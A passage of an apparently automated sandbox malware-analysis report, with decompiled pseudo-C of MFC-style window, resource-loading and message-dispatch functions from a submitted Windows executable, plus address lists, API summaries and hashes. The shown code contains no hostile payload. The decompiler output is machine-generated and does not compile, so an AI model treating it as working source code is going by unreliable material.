						goto L3;
					} else {
						 *((intOrPtr*)(_t91 + 0x20)) = _t86;
						E00416A7E(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
						_push(1);
						E004165C6(); // executed
						E0041576C(_t97 + 0x14, __eflags);
						 *((intOrPtr*)(_t97 + 0x48)) = 2;
						E00414D4B(_t97 + 0x14);
						_push( &_v80);
						_t42 = E00416609(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
						__eflags = _t42;
						if(_t42 != 0) {
							DragAcceptFiles( *( *((intOrPtr*)(_t91 + 0x20)) + 0x20), 1);
							E00412C34(_t86,  *((intOrPtr*)(_t91 + 0x4c)));
							UpdateWindow( *(_t86 + 0x20));
							_v36 = _t55;
							E004157B0( &_v84,  *( *((intOrPtr*)(_t91 + 0x20)) + 0x20));
							 *[fs:0x0] = _v44;
							return 1;
						} else {
							_v32 = _t55;
							E004157B0( &_v80, _t82);
							__eflags = 0;
							 *[fs:0x0] = _v40;
							return 0;
						}
					}
				} else {
					_t52 = GetVersion();
					_t103 = _t52 - 4;
					if(_t52 >= 4) {
						goto L4;
					} else {
						_push(0xffffffff);
						_push(0);
						_push(0x66);
						E00417146(_t54, _t81, GetVersion, _t91, _t103);
						L3:
						 *[fs:0x0] = _v32;
						return 0;
					}
				}
			}


































                  0x004016f0
                  0x004016f0
                  0x004016f2
                  0x004016fd
                  0x004016fe
                  0x00401701
                  0x00401704
                  0x0040170b
                  0x00401710
                  0x00401716
                  0x00401718
                  0x00401722
                  0x0040174a
                  0x0040174e
                  0x00401758
                  0x0040175d
                  0x00401760
                  0x00401764
                  0x0040176c
                  0x0040176e
                  0x0040178d
                  0x0040178d
                  0x00401770
                  0x00401770
                  0x00401775
                  0x0040177a
                  0x0040177f
                  0x00401786
                  0x00401786
                  0x0040178f
                  0x00401792
                  0x00401795
                  0x00401799
                  0x004017a3
                  0x004017a8
                  0x004017ab
                  0x004017af
                  0x004017b7
                  0x004017b9
                  0x004017c6
                  0x004017c6
                  0x004017bb
                  0x004017c2
                  0x004017c2
                  0x004017c8
                  0x004017ca
                  0x004017e0
                  0x004017e4
                  0x004017e6
                  0x004017e8
                  0x00000000
                  0x004017ee
                  0x004017f0
                  0x004017f3
                  0x004017f8
                  0x004017fc
                  0x00401805
                  0x00401811
                  0x00401819
                  0x00401822
                  0x00401825
                  0x0040182a
                  0x0040182c
                  0x00401859
                  0x00401865
                  0x0040186e
                  0x00401878
                  0x0040187c
                  0x0040188a
                  0x00401898
                  0x0040182e
                  0x00401832
                  0x00401836
                  0x0040183b
                  0x00401841
                  0x0040184f
                  0x0040184f
                  0x0040182c
                  0x00401724
                  0x00401724
                  0x00401726
                  0x00401728
                  0x00000000
                  0x0040172a
                  0x0040172a
                  0x0040172c
                  0x0040172e
                  0x00401730
                  0x00401735
                  0x0040173b
                  0x00401749
                  0x00401749
                  0x00401728

                  APIs
                  • GetVersion.KERNEL32(38A11573), ref: 0040171E
                  • GetVersion.KERNEL32 ref: 00401724
                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00401859
                  • UpdateWindow.USER32(?), ref: 0040186E
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Version$AcceptDragFilesH_prolog3UpdateWindow
                  • String ID:
                  • API String ID: 1881653373-0
                  • Opcode ID: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction ID: a17e9845648d9b61e4f7684013c638e6b3f52b511be3bda972cb7d9a165d9d00
                  • Opcode Fuzzy Hash: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction Fuzzy Hash: 6641B1B13443009BD714EB25DD42BAAB7E5AB84B14F00093FFA46933D1EB79E805875A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402500, Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                  Download Yara Rule
                  C-Code - Quality: 32%
                  			E00402500(char** __ecx, struct HINSTANCE__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t28;
				char _t35;
				char _t38;
				char _t41;
				char* _t45;
				char** _t49;
				char* _t50;
				char* _t53;
				signed int _t54;
				signed short* _t67;
				void* _t69;
				int _t72;
				intOrPtr _t73;
				short* _t75;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t71 = _a8;
				_t65 = _a4;
				_t49 = __ecx;
				if(FindResourceA(_a4, (_a8 >> 0x00000004) + 0x00000001 & 0x0000ffff, 6) == 0) {
					L2:
					return 0;
				} else {
					_t67 = E004019E0(_t65, _t24, _t71);
					_t79 = _t78 + 0xc;
					if(_t67 != 0) {
						_t3 =  &(_t67[1]); // 0x2
						_t75 = _t3;
						_t28 = WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, 0, 0, 0, 0); // executed
						_t72 = _t28;
						if((0x00000001 -  *((intOrPtr*)( *_t49 - 0x10 + 0xc)) |  *((intOrPtr*)( *_t49 - 0x10 + 8)) - _t72) < 0) {
							_push(_t72);
							E00401470(_t49, _t49, _t67);
						}
						_t53 =  *_t49;
						_t60 =  *_t67 & 0x0000ffff;
						WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, _t53, _t72, 0, 0);
						_pop(_t76);
						if(_t72 < 0) {
							L8:
							E00401090(_t53, _t60, 0x80070057);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t49);
							_push(_t72);
							_t73 = _v8;
							_t50 = _t53;
							if(_t73 != 0) {
								_t54 = _v12;
								if(_t54 == 0) {
									L12:
									E00401090(_t54, _t60, 0x80070057);
								}
								_t35 =  *_t50;
								_t77 =  *((intOrPtr*)(_t35 - 0xc));
								_push(_t67);
								_t69 = _t54 - _t35;
								_t60 = 0x00000001 -  *((intOrPtr*)(_t35 - 4)) |  *((intOrPtr*)(_t35 - 8)) - _t73;
								if(1 < 0) {
									_push(_t73);
									E00401470(_t50, _t50, _t69);
									_t54 = _v16;
								}
								_t38 =  *_t50;
								_push(_t73);
								if(_t69 > _t77) {
									_push(_t54);
									_t54 =  *(_t38 - 8);
									_push(_t54);
									_push(_t38);
									E0043065F(_t50, _t54);
								} else {
									_t60 =  *(_t38 - 8);
									_t54 = _t38 + _t69;
									_push(_t54);
									_push( *(_t38 - 8));
									_push(_t38);
									E00430B25(_t50);
								}
								_t79 = _t79 + 0x10;
								_pop(_t67);
								_pop(_t76);
								if(_t73 < 0) {
									goto L12;
								}
								_t41 =  *_t50;
								if(_t73 >  *((intOrPtr*)(_t41 - 8))) {
									goto L12;
								}
								 *((intOrPtr*)(_t41 - 0xc)) = _t73;
								 *((char*)(_t73 +  *_t50)) = 0;
								return _t41;
							} else {
								return E00401E30(_t53);
							}
						} else {
							_t45 =  *_t49;
							if(_t72 >  *((intOrPtr*)(_t45 - 8))) {
								goto L8;
							} else {
								 *(_t45 - 0xc) = _t72;
								( *_t49)[_t72] = 0;
								return 1;
							}
						}
					} else {
						goto L2;
					}
				}
			}


























                  0x00402502
                  0x0040250c
                  0x00402511
                  0x00402522
                  0x00402535
                  0x0040253a
                  0x00402524
                  0x0040252c
                  0x0040252e
                  0x00402533
                  0x0040254a
                  0x0040254a
                  0x00402552
                  0x00402558
                  0x0040256e
                  0x00402570
                  0x00402573
                  0x00402573
                  0x00402578
                  0x0040257a
                  0x00402589
                  0x0040258f
                  0x00402592
                  0x004025af
                  0x004025b4
                  0x004025b9
                  0x004025ba
                  0x004025bb
                  0x004025bc
                  0x004025bd
                  0x004025be
                  0x004025bf
                  0x004025c0
                  0x004025c1
                  0x004025c2
                  0x004025c6
                  0x004025ca
                  0x004025d6
                  0x004025dc
                  0x004025de
                  0x004025e3
                  0x004025e3
                  0x004025e8
                  0x004025eb
                  0x004025ee
                  0x004025f1
                  0x00402600
                  0x00402602
                  0x00402604
                  0x00402607
                  0x0040260c
                  0x0040260c
                  0x00402610
                  0x00402612
                  0x00402615
                  0x00402627
                  0x00402628
                  0x0040262b
                  0x0040262c
                  0x0040262d
                  0x00402617
                  0x00402617
                  0x0040261a
                  0x0040261d
                  0x0040261e
                  0x0040261f
                  0x00402620
                  0x00402620
                  0x00402632
                  0x00402635
                  0x00402636
                  0x00402639
                  0x00000000
                  0x00000000
                  0x0040263b
                  0x00402640
                  0x00000000
                  0x00000000
                  0x00402642
                  0x00402647
                  0x0040264d
                  0x004025cc
                  0x004025d3
                  0x004025d3
                  0x00402594
                  0x00402594
                  0x00402599
                  0x00000000
                  0x0040259b
                  0x0040259b
                  0x004025a1
                  0x004025ac
                  0x004025ac
                  0x00402599
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402533

                  APIs
                  • FindResourceA.KERNEL32(?,?,00000006), ref: 0040251A
                    • Part of subcall function 004019E0: LoadResource.KERNEL32(?,?,?,?,0040252C,?,00000000,?,?,00402740,00000000,?,?,?,?,0040AD0B), ref: 004019EC
                  • WideCharToMultiByte.KERNELBASE(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 00402552
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000), ref: 00402589
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharMultiResourceWide$FindLoad
                  • String ID:
                  • API String ID: 861045882-0
                  • Opcode ID: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction ID: ab90c26927212f4ee8fca040aa4f0871524c501861b284741b334b9420958e70
                  • Opcode Fuzzy Hash: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction Fuzzy Hash: 4221A5323412107FE3219B5ADC89F6777ACEB85750F11416AF540EB2D4D6B8AC5187A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004110C4, Relevance: 2.0, APIs: 1, Instructions: 452COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E004110C4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int _t201;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				unsigned int _t233;
				void* _t234;

				_t209 = __ecx;
				_push(0x70);
				E00431A9B(E0044B122, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t234 - 0x10)) = 0;
				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t234 + 8);
				 *(_t234 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t233 =  *(_t234 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E00410A7D(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E0040EE3C(_t198, __ecx, _t233));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t231 + 0x4c);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
								 *(_t234 + 0x10) = _t158;
								_t201 = (_t158 ^  *(_t234 + 8)) & 0x000001ff;
								E0040D713(_t201, _t234 - 0x14, _t231, _t233, 7);
								_t203 = 0x464b18 + _t201 * 0xc;
								 *(_t234 - 0x18) = _t203;
								__eflags =  *(_t234 + 8) -  *_t203;
								if( *(_t234 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t234 - 0x18);
									_t204 =  *(_t234 + 0x10);
									 *_t161 =  *(_t234 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t234 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t234 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
											while(1) {
												_t205 = E0040CDA9();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
													( *(_t234 - 0x18))[1] = _t205;
													E0040D747(_t234 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t233);
													L115:
													_push( *((intOrPtr*)(_t234 + 0xc)));
													L116:
													_t168 =  *_t206(); // executed
													L117:
													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t234 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t234 + 0x10) = _t204;
											continue;
										}
										_push( *(_t234 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E0040CDA9();
										 *(_t234 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
										( *(_t234 - 0x18))[1] = _t175;
										E0040D747(_t234 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M00411688))) {
											case 0:
												_push(E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E00422859(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E0040D77C(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E0040EE68(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E00424500(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x5c;
												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E0040F76D(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E00422859(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E00422E06(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E0040EE3C(__ebx, __ecx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc)));
												_push(E0040EE3C(__ebx, __ecx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E0040EE3C(__ebx, __ecx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E0040EE3C(__ebx, __ecx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
												E0040D747(_t234 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t234 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E0040D747(_t234 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t234 + 0x10) - _t182[2];
								if( *(_t234 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t234 + 0x10) = _t205;
								E0040D747(_t234 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t234 + 8) - 0xc000;
								if( *(_t234 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E00410AF5(_t198, _t231, _t231, _t233, _t233 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t234 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t234 + 0x14));
								if(_t169 != 0) {
									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
								}
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E0040D747(_t234 - 0x14);
								_t172 = 1;
								L40:
								return E00431B73(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t234 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t234 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t234 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
					goto L6;
				}
				_push( *(_t234 + 0x10));
				_push( *((intOrPtr*)(_t234 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
					goto L39;
				}
				goto L2;
			}


























                  0x004110c4
                  0x004110c4
                  0x004110cb
                  0x004110d0
                  0x004110d4
                  0x004110d7
                  0x004110de
                  0x004110e1
                  0x004110ea
                  0x0041110e
                  0x00411111
                  0x0041113d
                  0x00411140
                  0x00411143
                  0x00411150
                  0x00411150
                  0x00411155
                  0x00411158
                  0x0041116e
                  0x0041116e
                  0x00411171
                  0x00411173
                  0x004111c2
                  0x004111c6
                  0x004111d3
                  0x004111d6
                  0x004111dc
                  0x004111e7
                  0x004111ed
                  0x004111f0
                  0x004111f2
                  0x00411222
                  0x00411222
                  0x00411225
                  0x0041122b
                  0x0041122d
                  0x004112bc
                  0x004112bc
                  0x004112bf
                  0x00000000
                  0x00000000
                  0x00411235
                  0x0041123c
                  0x0041123e
                  0x00411240
                  0x00411284
                  0x00411289
                  0x004112a7
                  0x004112ac
                  0x004112ae
                  0x004112b0
                  0x00000000
                  0x00000000
                  0x00411292
                  0x00411294
                  0x00411650
                  0x00411653
                  0x00411658
                  0x00411658
                  0x0041165b
                  0x0041165b
                  0x0041165c
                  0x0041165c
                  0x0041165f
                  0x00411661
                  0x00411663
                  0x00411663
                  0x00000000
                  0x00411663
                  0x0041129a
                  0x0041129c
                  0x0041129e
                  0x004112a3
                  0x004112a3
                  0x004112a6
                  0x004112a6
                  0x004112b2
                  0x004112b5
                  0x004112b7
                  0x004112b9
                  0x00000000
                  0x004112b9
                  0x00411242
                  0x00411245
                  0x00411248
                  0x0041124d
                  0x00411250
                  0x00411252
                  0x00000000
                  0x00000000
                  0x00411257
                  0x0041125d
                  0x00411262
                  0x0041126b
                  0x0041126e
                  0x00411271
                  0x00000000
                  0x00000000
                  0x00411277
                  0x00000000
                  0x00411302
                  0x00000000
                  0x00000000
                  0x0041130c
                  0x00000000
                  0x00000000
                  0x00411326
                  0x00411328
                  0x00411328
